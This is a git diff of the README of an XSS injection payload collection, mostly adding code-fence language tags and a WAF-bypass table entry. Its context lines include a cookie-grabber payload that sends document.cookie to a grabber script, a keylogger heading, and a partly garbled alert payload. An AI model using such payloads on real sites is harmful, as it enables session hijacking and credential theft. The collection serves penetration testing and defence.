diff --git a/XSS injection/README.md b/XSS injection/README.md
index 39897b3..59ff094 100644
--- a/XSS injection/README.md
+++ b/XSS injection/README.md
@@ -8,11 +8,12 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
- [XSS in files](#xss-in-files)
- [Polyglot XSS](#polyglot-xss)
- [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
+ - [Common WAF Bypas](#common-waf-bypass)
## Exploit code or POC
Cookie grabber for XSS
-```
+```php
document.location='http://localhost/XSS/grabber.php?c=' + document.cookie
@@ -27,7 +28,7 @@ fclose($fp);
```
Keylogger for XSS
-```
+```html
```
@@ -41,13 +42,13 @@ More exploits at [http://www.xss-payloads.com/payloads-list.html?a#category=all]
## Identify an XSS endpoint
-```
+```javascript
```
## XSS in HTML/Applications
XSS Basic
-```
+```javascript
Basic payload
ipt>alert('XSS')ipt>
@@ -74,7 +75,7 @@ Svg payload
```
XSS for HTML5
-```
+```javascript